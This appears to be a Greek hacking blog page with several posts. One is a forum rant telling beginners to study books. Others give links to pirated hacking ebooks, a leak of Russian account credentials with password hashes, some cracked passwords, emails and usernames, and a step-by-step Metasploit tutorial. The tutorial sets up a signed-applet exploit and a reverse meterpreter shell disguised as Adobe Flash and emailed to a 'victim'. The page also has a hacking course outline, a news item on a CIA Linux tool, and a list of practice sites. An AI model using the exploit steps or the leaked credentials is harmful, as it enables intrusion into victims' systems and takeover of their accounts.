Γιατί είναι πρόβλημα... Αρχικά θα σας θυμίσω ότι πριν μια βδομάδα δεν ξέρατε τίποτα... Πάμε να δούμε τι χρειάζεται να ξέρετε για τις παραπάνω ερώτησης...

1) Για να απαντήσω αυτήν την ερώτηση και να σας κάνω να καταλάβετε τι λέω, πρέπει να σας πω τα παρακάτω:

Ένα βιβλίο για το πως λειτουργούν τα κενά ασφαλίας
Το εγχειρίδιο του metasploit
Πιθανότατα κάποια πράγματα για C/Assembly και buffer overflows.

Όλα τα παραπάνω είναι όμως τρία βιβλία...

2)Για να απαντήσω αυτήν την ερώτηση και να σας κάνω να καταλάβετε τι λέω, πρέπει να σας πω τα παρακάτω:
Αρχικά να μάθω με ποιον τρόπο θέλετε να το χακάρετε... Υπάρχουν 100.000 διαφορετικοί τρόποι αλλά ας πάμε στον ποιο απλό... phising.
Μπορώ να σας πω τι είναι σε 2 λεπτά και να το καταλάβετε... αλλά για να σας πω πως να το κάνετε χρειάζεται:

Να σας μάθω php
Να σας μάθω CSS
Να σας μάθω html
Να σας μάθω ίσως mysql (αν θέλετε να γλιτώσετε από google dorks :P)
Να σας μάθω Social Engineering

Σύνολο 2 με 3 βιβλία...

3)Πως μπορώ να κάνω sqli/xss/rce

Τα πράγματα αλλάζουν από στόχο σε στόχο και για να μπορείτε να καταλάβετε τι χρειάζεται σε κάθε περίπτωση πρέπει να σας μάθω:

PHP
CSS
MYSQL
Javascript
XML
HTML
JSON (για serialization γατάκι :P)
Και πιθανότατα python αν θέλετε να φτιάχνετε και δικά σας scriptakia ώστε να μην παιδεύεστε συνέχεια...

Σύνολο 2 με 3 βιβλία...

4)Γιατί το rat μου δουλεύει μόνο σε local δίκτυο.

Πρέπει να σας μάθω πως λειτουργούν τα δίκτυα και πως επικοινωνούν οι συσκευές μεταξύ τους... 1 βιβλίο

Ακόμα και να ήθελα να σας τα εξηγήσω θα πρέπει να γράφω 8 ώρες στο chat για να σας πάω από το 0 στο βήμα 123 που είναι αυτή η ερώτηση. Από την άλλη τα βιβλία σας σας προετοιμάζουν για αυτές τις απορίες, ώστε να σας τις λύσω με 2 κουβέντες ή να βρείτε μόνοι σας τις απαντήσεις εύκολα...

Για παράδειγμα αν πριν ρωτήσετε πως μπορώ να κάνω sqli/xss/rce και έχετε ήδη μάθει τις γλώσσες που έχω αναφέρει τότε φτάνει να πω: σπας το tag και βάζεις δίκες σου εντολές στον κώδικα μαζί με ένα παράδειγμα η μια μικρή περιγραφεί αρκεί για να καταλάβετε τι γίνετε, άσχετα αν χρειάζεται ένα βιβλίο για να καταλάβετε όλες τι περιπτώσεις και πως μπορείτε να εκμεταλλευτείτε την κάθε μια μαζί με tips & tricks που υπάρχουν...

Και ναι θα ήταν τόσο απλό να σας το εξηγήσω αν είχατε τις γνώσεις...

Που θέλω να καταλήξω: Σας έχω δώσει υλικό για αυτές τις απορίες πριν ακόμα τις ρωτήσετε, αλλά δυστυχώς αυτό απαιτεί χρόνο και κόπο. Πραγματικά γιατί ΜΕΡΙΚΟΙ νομίζετε ότι σας προτείνω βιβλία ολόκληρα? Για να σας προετοιμάσω... δεν μπορείτε να μάθετε hacking χωρίς το ανάλογο υπόβαθρο... Το μόνο που μπορείτε να κάνετε είναι να μάθετε επιφανειακά κάποια πράγματα και μηχανικά κάποιες μεθόδους, πότε όμως δεν θα καταλαβαίνεται τη γίνετε από πίσω... Αυτό όμως δεν είναι hacking είναι παίρνω ένα εργαλείο ή 5 μεθόδους και παίζω με αυτά για να περάσει η ώρα.

Δεν με πειράζει όμως τόσο αυτό... αλλά με πειράζει ότι σας εξηγώ ότι ακόμα και να σας βοηθήσω τώρα, εσείς δεν θα μάθετε τίποτα. Στην καλύτερη περίπτωση θα προσθέσετε μια μέθοδο στην λίστα σας. Δεν θα καταλάβετε όμως κάτι παραπάνω όπου είναι και το νόημα της βοήθειας που μου ζητάτε πιστεύω. Προσθέτω επίσης, ότι δεν αντιλαμβάνεστε την βοήθεια που σας προσφέρεται είδη... Αλλά ας πάμε τώρα στην δική μου περίπτωση για να δείτε τι εννοώ..

Όταν μου είπε ο Gnosis να μάθω python γιατί είναι χρήσιμη στο hacking τον άκουσα (πριν από 6 χρόνια περίπου κάπου πολύ μακρυά από εδώ )... Άλλα ήμουν αρκετά ηλίθιος ώστε να μην ρωτήσω για καλό υλικό. Διάβασα 2 βιβλία μέχρι να βρω ένα καλό βιβλίο που να σου μάθαινε όντος την γλώσσα σε βάθος και όχι απλά 5 πράγματα για το πως συντάσσεται... Χαμένος χρόνος και κόπος αυτά τα δύο βιβλία... Ναι έμαθα tricks άξιζαν να διαβάσω 2 βιβλία για να μάθω 1 trick? (πραγματικά ακόμα δεν ξέρω την απάντηση :P) Μετά βρήκα καλό υλικό (βιβλίο) και έμαθα καλά την γλώσσα python... Το email bruteforcer και email dictonary attack (προγράμματα που έχουν ανέβει στο φόρουμ) τότε τα έφτιαξα με αυτές τις γνώσεις που πείρα από το βιβλίο...

Εσείς έρχεστε, σας λέω τι χρειάζεστε σας δίνω το υλικό έτοιμο και το μόνο που έχετε να κάνετε είναι να το διαβάσετε και να με ρωτήσετε απορίες. Ε πόσο ποιο μασημένη τροφή ποια? το επόμενο βήμα είναι να σας τα κάνω σε μάθημα... Κάτι που δεν θα γίνει πότε...

Το χειρότερο είναι (ναι υπάρχει και άλλο). Ότι εφόσον με ρωτάτε ότι με ρωτάτε (που είναι πολύ προχωρημένο για εσάς και δεν μπορώ να σας το μάθω αν δεν κάτσουμε 2-3 ώρες), σας λέω ότι η απάντηση είναι στο βιβλίο και για να σας λύσω την απορία και να μάθετε όπως πρέπει θα χρειαστεί να το διαβάσετε, και συνεχίζετε να το αγνοείτε ... Ε τη περιμένετε να κάνω να σας ανοίξω το κεφάλι και να σας βάλω μέσα τις γνώσεις?

Θέλω να πω ότι δεν γίνετε να μάθεις διαφορετικά και αυτό που έχω κάνει εγώ είναι να συγκεντρώσω το υλικό σε μια γραμμή ώστε να μην χαλάτε χρόνο για να ψάχνεστε και να μαθαίνεται συνέχεια... Πριν μου πει ο Gnosis μάθε python σκεφτόμουν έναν μίνα τι έπρεπε να μάθω τότε (χαμένος χρόνος). Αυτά εγώ σας τα προσφέρω αλλά δεν μπορώ να σας τα μάθω όλα από το 0. Με ποιο απλά λόγια, σας δείχνω τον δρόμο αλλά θα τον περπατήσετε μόνοι σας. Δεν θα σας κουβαλήσω...

Κάτι άλλο που μου λένε πολύ... Εγώ έχω μάθει τόσα πράγματα από το youtube... ΌΧΙ... ΜΕ ΚΕΦΑΛΑΙΑ ΌΧΙ... έχεις παρακολουθήσει 5-10-100 video και έχεις μάθει πολύ επιφανειακά πράγματα... τόσο επιφανειακά που το δεύτερο (και πολύ λέω) κεφάλαιο των βιβλίων που λέω έχει πολύ σημαντικότερα πράγματα που όχι μόνο είναι σημαντικά αλλά δεν μπορείς να πας παρακάτω χωρίς αυτά (προσοχή μιλάω για τον κλασικό τύπο που βλέπει videakia για το πως να χακάρις facebook,windows 7 machine,wifi κλπ. Αν τα πάρεις από την σειρά και μάθεις τις γλώσσες από courses του youtube και μετά που θα είναι η ώρα μάθεις και hacking τότε αλλάζουν όλα εκεί και είναι και εφικτό...)

Το παραπάνω είναι ότι ποιο εύκολο για να το αποδείξω... Έστω ότι μαθαίνετε να σπάτε ιστοσελίδες με το sqlmap ή ακόμα και χειροκίνητα. Αν σας ρωτήσω πως δουλεύει η ιστοσελίδα ή πως συνδέετε η php στην mysql που προσπαθείτε να exploitarete δεν ξέρετε να μου απαντήσετε... Αυτό όμως σημαίνει ότι αν αλλάξει το παραμικρό πράγμα και χρειαστεί μια αλλαγή πάνω στην μέθοδο που έχετε η οποία δεν είναι στο google, τότε δεν θα καταφέρετε πότε να χακάρετε τον στόχο. (Πέρα από μερικές εξαιρέσεις που ίσως τύχει να δουλέψει το payload αλλά και πάλι δεν θα ξέρετε γιατί δούλεψε και γιατί όχι)

Ένα άλλο τεράστιο και μοιραίο λάθος που κάνετε είναι ότι επικεντρώνεστε στο πως να σπάσετε (χειραγωγήσετε ποιο σωστά) πράγματα. Δεν ενδιαφέρεστε καθόλου για την ιδεολογία του hacking και πως ξεκινήσετε και για τον ανοικτό κώδικα, κάποια πράγματα που κανονικά θα έπρεπε να ξεκινούσατε από εκεί. Μάλιστα οι περισσότεροι δεν έψαξαν καν για το τι σημαίνει/είναι χακέρ, νομίζουν ότι είναι ότι λέει η τηλεόραση και πως είδη το ξέρουν και δεν χρειάζεται να ψάξουν...

Προσπαθώ πραγματικά να σας βοηθήσω και θέλω... Σας λέω πως να γίνετε καλύτεροι από εμένα όσο ποιο γρήγορα γίνετε... Σας λέω τι θα έκανα εγώ αν ξεκινούσα τώρα από το 0 και ήθελα να μάθω σωστά γρήγορα και τσάμπα. Αλλά αν δεν με ακούτε, δεν μπορώ να σας βοηθήσω αλλιώς. Ακόμα και να πω ότι θα σας τα μάθω όλα και θα το παίξω καθηγητής, πόσους νομίζετε ότι θα διδάξω, σε πόσο χρόνο και μέχρι που θα φτάσουν και πόσο καλοί θα γίνουν? Σας πληροφορώ ότι επειδή θα ασκείτε πίεση για να βγει η ύλη, άτομα που ακολούθησαν απλά τις συμβουλές μου, σε βάθος χρόνου θα γίνουν καλύτεροι από αυτούς και πιθανότατα και από εμένα αν μείνω στάσιμος.



Αν θέλετε πραγματικά να μάθετε στρωθείτε στην μελέτη... Αν θέλετε να χασομεράτε και να χάνετε τον χρόνο σας απλά βλέποντας και κάνοντας επιφανειακά πράγματα που δεν έχουν και σχέση με το hacking τότε καθίστε στο youtube



Δυστυχώς ήρθε και για εμένα η ώρα να πάρω αυτήν την δύσκολη απόφασή. Στου αρχάριους που δεν ξέρουν τίποτα θα τους λέω μια φόρα πως να ξεκινήσουν και τη να διαβάσουν... Αν έρθουν με μια απορία του βήματος 87 την επόμενη βδομάδα και βρίσκονται στο βήμα 3 τότε απλά θα τους στέλνω αυτό εδώ το κείμενο... Έχω φάει πολλαπλές ώρες να εξηγώ γιατί με τα videakia δεν μαθαίνεις και γιατί βιβλία ή courses είναι απαραίτητα ή ακόμα και να κάνω τον άλλον να καταλάβει κάτι όπου υστερεί τις γνώσεις για να το καταλάβει. Προτιμώ να αφιερώσω αυτόν τον χρόνο ώστε πραγματικά να βοηθήσω κάποιον μέσο του φόρουμ ή ακόμα και το φόρουμ το ίδιο... Όποιος θέλει θα μάθει και θα είμαι εδώ για να τον βοηθήσω αλλά δεν θα ταΐσω/διδάξω κανέναν...



(Το θέμα αυτό προέρχεται από το greekhacking.gr)

Διαβάστε Περισσότερα »

15 Ιουλίου 2017

Learning Hacking All Books 20


Tο foulscode.com κάνει διαμερισμό συνδέσμων.

Κάντε ένα μια κοινοποίηση για να μας ενθαρρύνεται να συνεχίσουμε!




1. 2014_car_hackers_handbook_compressed.pdf 12.4 MB
http://yabuilder.com/6wdn

2. Enterprise Cybersecurity.pdf 20.9 MB
http://yabuilder.com/6wfn

3. Gray Hat Hacking - The Ethical Hacker's Handbook - 4th Edition (2015).epub 16.0 MB
http://yabuilder.com/6wh3

4. Hacking - 101 Hacking Guide - 2nd Edition (2015).epub 1.7 MB
http://yabuilder.com/6wiA

5. Hacking For Dummies, 5th Edition.pdf 11.2 MB
http://yabuilder.com/6wja

6. Hacking-Point-of-Sale-Payment-Application-Secrets-Threats-and-Solutions-Slava-Gomzin.pdf 40.9 MB
http://yabuilder.com/6wkM

7. Hacking+and+Penetration+Testing+With+Low+Power+Devices.Philip+Polstra.Sep%2C+2014.pdf 8.3 MB
http://yabuilder.com/6wlV

8. Instant Penetration Testing.pdf 3.8 MB
http://yabuilder.com/6wnO

9. Kali Linux - Wireless Penetration Testing Beginners Guide (2015).pdf 12.7 MB
http://yabuilder.com/6wqI

10. Kali Linux Web Penetration Testing Cookbook.pdf 11.8 MB
http://yabuilder.com/6wqy

11. Learning Metasploit Exploitation and Development.pdf 9.1 MB
https://mega.nz/#!drownR5C!_tpzswrLcuKVMVs8Fua0MAaOV2K4rgWe1yAFXXVT-_4

12. Learning Pentesting for Android Devices.pdf 13.6 MB
https://mega.nz/#!EugRiIhT!s942nKq_kIGL6arbQ1F08tP6uUAXcIITgfjNOtnz9pA

13. Mastering Kali Linux Wireless Pentesting.pdf 25.2 MB
https://mega.nz/#!svBhgaKR!ljsIa4-cmVtHve_0QDjR2NWL9l1Zgz3eUHCqIXVZZac

14. Metasploit Penetration Testing Cookbook, Second Edition.pdf 6.9 MB
https://mega.nz/#!YmBXDTyD!VHAN4bJFgElobeMDPwT92twef7UUxITCMIlg8vaE5A4

15. pwk.1.0.pdf 17.9 MB
https://mega.nz/#!EuwHkQDB!YIg2gBimM-KnpA2u5yOg6HA6H4csQGFLUrIHDneqWYo

16. SHELL UPLOADING GUIDE.pdf 319 KB
https://mega.nz/#!A2AiXQ4b!8Zn5ceei5VVc8Z93h4GisZS4mZnK21QcrewNirjzz4s

17. The Browser Hacker-s Handbook.pdf 23.3 MB
https://mega.nz/#!4u5yiQjI!nBRBx7AsbfFobNHQODLj3egUS-4yc2x9KAv2_aViDqU

18. Visual Cryptography and Secret Image Sharing.pdf 9.7 MB
https://mega.nz/#!NzYTHbjI!9bSpayDXc_l9kAjkiIBU-rlaq_Mqbd-s1cfvH5XAAQI

19. Wiley.The.CISSP.Prep.Guide.Gold.Edition.eBook-kB.pdf 9.3 MB
https://mega.nz/#!lrY2GI7Q!FultB0pWX4LawoF7fpxPVUCqtgQ1WwTbM_NmeXmd39o

20. wp-pen-testing-android-apps.pdf 1.3 MB
https://mega.nz/#!N3YxnaIS!erYevIPuJdOskLmALAV6atJHNvGbYFR_ZZkj6kC9tSg
Διαβάστε Περισσότερα »

12 Ιουλίου 2017

1,000+ usernames and passwords leaked for #OpRussia.





www.tagszn.ru

 teaser passwords:

 006403fa68aeb8cf5d9cfae1d561246b
 00b9843464e9c35007bf5824b8114453 (Z11iCZ7324)
 011e95c8d2eb765f87c54bd28801a95d
 01b43df153146e5cb88485649e1239e0
 01d599755e63287dffcbbb20ebbf0feb (zEwZUjO34) 
01f140858ea5dcd9e3355bab1d642aeb

 emails:

 0luggsi131@trumhome.info
 10101010_00978@mail.ru
 10host@bk.ru
 11591159@11591159.ru
 234455654@mail.ru
 usernames: !!!Farm!!! 
!angel! !Pharmacy! 0ut0fhead 1encereal1 2help 




Διαβάστε Περισσότερα »

9 Ιουλίου 2017

Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3

Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

Requirement :

1. Metasploit Framework

2. Operating System(Προτείνω Linux OS ή Backtrack 5)

Βήμα προς Βήμα:

Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

Terminal: msfconsole <-|


Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:


use exploit/multi/browser/java_signed_applet <-|(φορτίζουμε το java_signed_applet exploit)

set payload windows/meterpreter/reverse_tcp <-|(ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)


Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...


Terminal: set appletname Adobe_Inc <-|
set certcn Adobe Flash Player <-|

set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)

set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)

set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί --> http://192.168.8.92/videoplaylist)

set lhost 192.168.8.92 <-| (η διεύθυνση μας)

set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)

exploit <-| (έναρξη έκθεσης...)


Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.

Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:


Terminal: session -l <-| (για να δω τα ενεργά session)

Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..

session -i <-|


Τέλος μας εμφανίζει στην οθόνη meterpreter>που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεταιποινικά από το νόμο.

via: securitydnainfo.blogspot.gr


Διαβάστε Περισσότερα »

5 Ιουλίου 2017

Πως να γίνεις ethical hacker απο beginer.




Yπάρχει ένα πολύ ωραίο βίντεο στο διαδίκτυο που δείχνει τεχνικές που χρησιμοποιούν οι ethical hackers. Το βίντεο διαρκεί 16 ώρες μετά από αυτό το βίντεο θα έχετε τεράστιες γνώσης πάνω στο hacking άλλα επί της ουσίας θα είστε script kiddies, διότι δεν έχετε παιδευτη για να τα κάνετε μονοί σας, απλός βρήκατε τους κώδικες στο πιάτο και τους εκτελέσατέ. Βέβαια η αλήθεια είναι ότι μπορεί να σας βοηθήσει στο να κατανοήσετε τι κάνει ένας ethical hacker και ακόμα μπορεί να σας δείξει τον δρόμο για να ξέρετε τι βιβλία να διαβάσετε καθώς στο βίντεο αναφέρεται (kali linux ssl devil twin SQL injection hydra ddos και πολλά ακόμη που βαριέμαι να τα γράψω γιατί ξεπερνάνε της 30 κατηγορίες ...)

λοιπόν το βίντεο είναι εδώ, είναι 16 ώρες, πάρτε βαθιά ανάσα αποφασίστε ότι σήμερα δεν θα βγείτε από το σπίτι και να έχετε λεφτά για delivery και είστε έτοιμοι.





Get the complete hacking bundle!
http://josephdelgadillo.com/product/h...

Enroll in the FREE teachable course!
https://goo.gl/em1Dg9

Enroll in the 4 courses directly on Udemy!
The Complete Ethical Hacking Course for 2017!
http://bit.ly/2jFrv3e
Certified Ethical Hacker Boot Camp for 2017!
http://bit.ly/2iZvhDS
The Complete Ethical Hacker Course: Beginner to Advanced!
http://bit.ly/2klAkkc
Build an Advanced Keylogger for Ethical Hacking!
http://bit.ly/2jqfTOE

If you want to get started hacking you will LOVE The Complete Ethical Hacking Course: Beginner to Advanced! This complete course as seen on Udemy http://bit.ly/2klAkkc, and will take you from beginner to expert hacker. We will begin with the very basics showing you how to setup your environment, and move on to password cracking, WiFi hacking, Dos attacks, SQL injections, and much more!

Enroll in The Complete Hacking Course Bundle for 2017!
http://josephdelgadillo.com/product/h...

Time Stamps
01:01 Introduction to ethical hacking
09:02 Prerequisites for this course
16:31 Basic terminology: white hat, gray hat, black hat
28:31 Basic terminology: SQL injections, VPN, proxy, VPS, and keyloggers
46:49 VirtualBox installation
55:48 VirtualBox installation through the repositories
1:10:50 Creating a virtual environment
1:24:25 Installing VirtualBox on Windows
1:29:41 Kali Linux installation/setup
1:57:59 VirtualBox Guest Additions installation
2:12:39 Linux terminal basics
2:22:11 Linux command line interface basics
2:51:41 Tor browser setup
3:17:46 Proxychains
3:57:21 Virtual private network
4:15:50 Changing your mac address with macchanger
4:39:07 Footprinting with network mapper (nmap) and external resources
5:26:19 Attacking wireless networks cracking WPA/WPA2
5:41:33 Aircrack-ng & reaver installation
5:54:17 Installing aircrack-ng on Windows & Crunch on Linux
6:05:52 Aricrack-ng & crunch hacking example
6:48:03 Cracking WPS pins with reaver pt.1
7:03:27 Cracking WPS pins with reaver pt.2
7:14:09 Cracking WPS pins with reaver pt.3
7:30:34 Performing denial of service attacks on wireless networks pt.1
7:43:48 Performing denial of service attacks on wireless networks pt.2
8:01:44 SSL strip pt.1
8:10:33 SSL strip pt.2
8:21:11 SSL strip pt.3
8:39:24 Funny things pt.1
8:46:28 Funny things pt.2
8:58:40 Funny things pt.3
9:17:02 Evil twin pt.1
9:27:37 Evil twin pt.2
9:35:05 Evil twin pt.3
9:46:24 Using known vulnerabilities pt.1
9:56:04 Using know vulnerabilities pt.2
10:05:25 Using known vulnerabilities pt.3
10:24:20 Post authentication exploitation (DNS) pt.1
10:33:58 Post authentication exploitation (DNS) pt.2
10:46:20 Post authentication exploitation (DNS) pt.3
11:00:01 SQL injection pt.1
11:12:34 SQL injection pt.2
11:27:20 SQL injection pt.3
11:40:42 SQL injection pt.4
11:52:06 SQL injection pt.5
12:09:02 Brute force methods for cracking passwords – cracking hashes
12:21:06 Cracking linux passwords with john the ripper pt.1
12:33:51 Cracking linux passwords with john the ripper pt.2
12:42:41 Cracking windows passwords with john the ripper
13:02:06 Hydra usage pt.1
13:19:20 Hydra usage pt.2
13:37:41 DoS attack pt.1 introduction to denial of service attacks
13:56:18 DoS attack pt.2 combine slowloris.pl with nmap
14:04:38 DoS attack pt.3 featuring hackers.org
14:14:24 Intro to metasploit and reverse shells
14:32:52 Metasploit starting from a two terminal setup
14:51:16 Making reverse shells persistent on another system and escalating privileges
15:07:51 Creating a persistent shell with metasploit
15:18:48 Using netcat to make any kind of connection you may need
15:38:49 How to upload a reverse shell onto a web server


via: greekhacking.gr
Διαβάστε Περισσότερα »

4 Ιουλίου 2017

OutlawCountry hacking εργαλείο της CIA για συσκευές με Linux



OutlawCountry : Μετά από το εργαλείο ELSA, το οποίο σύμφωνα με το WikiLeaks είναι ένα malware των Windows που χρησιμοποιεί η CIA για τον προσδιορισμό της θέσης ενός συγκεκριμένου χρήστη, έρχεται η αποκάλυψη του OutlawCountry, ένα διαφορετικό εργαλείο hacking που χρησιμοποιεί η υπηρεσία, σε συσκευές Linux.

Ένα εγχειρίδιο χρήσης που διέρρευσε το WikiLeaks αποκαλύπτει ότι η CIA χρησιμοποιεί το OutlawCountry τουλάχιστον από τον Ιούνιο του 2015. Το εργαλείο είναι ειδικά σχεδιασμένο για να ανακατευθύνει την εξερχόμενη κίνηση στο Internet σε άλλες διευθύνσεις.



Αυτό ουσιαστικά σημαίνει ότι οι πράκτορες της CIA μπορούν να παρακολουθήσουν τη δραστηριότητα ενός διακομιστή Linux. Για να είναι όμως αποτελεσματικό το OutlawCountry, η μυστική υπηρεσία πληροφοριών θα πρέπει πρώτα να αποκτήσει προνόμια πρόσβασης root.

Με άλλα λόγια, η CIA θα πρέπει πρώτα να παραβιάσει ένα σύστημα Linux με κάποια διαφορετική μέθοδο πριν μπορέσει να λειτουργήσει το OutlawCountry.
OutlawCountry

Το WikiLeaks αναφέρει ότι η πρώτη έκδοση του OutlawCountry περιέχει ένα kernel module για το CentOS/RHEL 6.x στα 64 bit και μπορεί να λειτουργεί μόνο με προεπιλεγμένους πυρήνες (kernels), ενώ υποστηρίζει μόνο την προσθήκη συγκεκαλυμμένων κανόνων DNAT στο PREROUTING chain.

“Το κακόβουλο λογισμικό αποτελείται από ένα kernel module που δημιουργεί έναν κρυφό πίνακα netfilter σε ένα στόχο Linux. Γνωρίζοντας το όνομα του πίνακα, ο επιτιθέμενος μπορεί να δημιουργήσει κανόνες που υπερισχύουν των υφιστάμενων κανόνων netfilter/iptables και είναι κρυφοί από έναν χρήστη ή ακόμα και από τον διαχειριστή συστήματος”, αναφέρει το WikiLeaks.

Το εγχειρίδιο χρήσης εξηγεί επακριβώς τον τρόπο λειτουργίας του hacking εργαλείου, ενώ αποκαλύπτει ότι η CIA μπορεί να αφαιρέσει όλα τα ίχνη του κακόβουλου λογισμικού μόλις ολοκληρωθεί η επίθεση.


“Το εργαλείο OutlawCountry φέρει ένα λειτουργικό kernel module για το Linux 2.6. Ο επιτιθέμενος φορτώνει το module με shell στο στόχο. Όταν φορτωθεί, το module δημιουργεί ένα νέο πίνακα netfilter. Ο νέος πίνακας επιτρέπει τη δημιουργία ορισμένων κανόνων χρησιμοποιώντας την εντολή iptables. Αυτοί οι κανόνες υπερισχύουν των υφιστάμενων κανόνων και είναι ορατοί μόνο σε ένα διαχειριστή που γνωρίζει το όνομα του πίνακα. Όταν ο επιτιθέμενος αφαιρέσει το kernel module, ο νέος πίνακας αφαιρείται επίσης.”

Ακριβώς όπως στα Windows, συνιστάται στους χρήστες του λειργικού Linux να ενημερώνουν τα συστήματα τους άμεσα στις πιο πρόσφατες εκδόσεις και να αναπτύσσουν όλα τα διαθέσιμα patches που κυκλοφορούν στα επίσημα αποθετήρια τις κάθε διανομής.
WikiLeaks Vault 7



Να υπενθυμίσουμε ότι το Wikileaks κυκλοφορεί έγγραφα στη σειρά Vault 7 από τις 7 Μαρτίου, εκθέτοντας όλο και περισσότερα εργαλεία των hackers της CIΑ.

“Year Zero” η CIA εκμεταλλεύεται δημοφιλή hardware και λογισμικό.
“Weeping Angel” το εργαλείο κατασκοπείας που χρησιμοποιεί η υπηρεσία για να διεισδύσει σε έξυπνες τηλεοράσεις, μετατρέποντάς τες σε συγκεκαλυμμένα μικρόφωνα.
“Dark Matter” exploits που στοχεύουν iPhones και Mac.
“Marble” ο πηγαίος κώδικας ενός μυστικού anti-forensic framework. Ουσιαστικά είναι ένα obfuscator που χρησιμοποιεί η CIA για να κρύψει την πραγματική πηγή κακόβουλου λογισμικού.
“Grasshopper” ένα framework το οποίο επιτρέπει στην υπηρεσία πληροφοριών να δημιουργήσει εύκολα προσαρμοσμένο κακόβουλο λογισμικό για να παραβιάζει Windows της Microsoft και να παρακάμψει κάθε προστασία από ιούς.



“Archimedes”– ένα εργαλείο επίθεσης MitM που φέρεται ότι δημιούργησε η CIA για τη στοχοθέτηση υπολογιστών μέσα σε ένα τοπικό δίκτυο (LAN).

"Scribbles" ένα software που είναι σχεδιασμένο να προσθέτει ‘web beacons’ σε απόρρητα έγγραφα, για να επιτρέπει τον έλεγχο των διαρροών από τις μυστικές υπηρεσίες.

"Athena": έχει σχεδιαστεί για να μπορεί να αποκτήσει απόλυτα τον πλήρη έλεγχο των μολυσμένων υπολογιστών Windows, επιτρέποντας στην CIA να εκτελεί πάρα πολλές λειτουργίες στο μηχάνημα-στόχο, όπως διαγραφή δεδομένων ή εγκατάσταση κακόβουλου λογισμικού, κλοπής δεδομένων και αποστολής τους σε servers της CIA.

"CherryBlossom" εργαλείο που παρακολουθεί τη δραστηριότητα στο διαδίκτυο ενός στόχου, να ανακατευθύνει το πρόγραμμα περιήγησης, να ανιχνεύει διευθύνσεις ηλεκτρονικού ταχυδρομείου και αριθμούς τηλεφώνου και πολλά άλλα, μέσω του router.
"Brutal Kangaroo" εργαλείο που μπορεί να χρησιμοποιηθεί για να μολύνει air-gapped υπολογιστές με κακόβουλο λογισμικό.

"ELSA" malware των Windows που χρησιμοποιεί η CIA για τον προσδιορισμό της θέσης ενός συγκεκριμένου χρήστη χρησιμοποιώντας το Wi-Fi του υπολογιστή του.







Πηγή: secnews
Διαβάστε Περισσότερα »

3 Ιουλίου 2017

Λίστα με ιστοσελίδες για εξάσκηση hacking (2017)





|  Site name  |                                           |   Description   |

$natch competition Remote banking system containing common vulnerabilities.

Arizona Cyber Warfare Range The ranges offer an excellent platform for you to learn computer network attack (CNA), computer network defense (CND), and digital forensics (DF). You can play any of these roles.

Avatao More than 350 hands-on challenges (free and paid) to master IT security and it's growing day by day.

BodgeIt Store The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.

Bright Shadows Training in Programming, JavaScript, PHP, Java, Steganography, and Cryptography (among others).

bWAPP bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.

Cyber Degrees Free online cyber security Massive Open Online Courses (MOOCS).

Commix testbed A collection of web pages, vulnerable to command injection flaws.

CryptOMG CryptOMG is a configurable CTF style test bed that highlights common flaws in cryptographic implementations.

Cyber Security Base Cyber Security Base is page with free courses by University of Helsinki in collaboration with F-Secure.

Cybersecuritychallenge UK Cyber Security Challenge UK runs a series of competitions designed to test your cyber security skills.

Cybertraining365 Cybertraining365 has paid material but also offers free classes. The link is directed at the free classes.

Cybrary.it Free and Open Source Cyber Security Learning.

Damn Small Vulnerable Web Damn Small Vulnerable Web (DSVW) is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes. It supports majority of (most popular) web application vulnerabilities together with appropriate attacks.

Damn Vulnerable Android App Damn Vulnerable Android App (DVAA) is an Android application which contains intentional vulnerabilities.

Damn Vulnerable Hybrid Mobile App Damn Vulnerable Hybrid Mobile App (DVHMA) is an hybrid mobile app (for Android) that intentionally contains vulnerabilities.

Damn Vulnerable iOS App Damn Vulnerable iOS App (DVIA) is an iOS application that is damn vulnerable.

Damn Vulnerable Linux Damn Vulnerable Linux (DVL) is everything a good Linux distribution isn't. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks.

Damn Vulnerable Router Firmware The goal of this project is to simulate a real-world environment to help people learn about other CPU architectures outside of the x86_64 space. This project will also help people get into discovering new things about hardware.

Damn Vulnerable Stateful Web App Short and simple vulnerable PHP web application that naïve scanners found to be perfectly safe.

Damn Vulnerable Thick Client App DVTA is a Vulnerable Thick Client Application developed in C# .NET with many vulnerabilities.

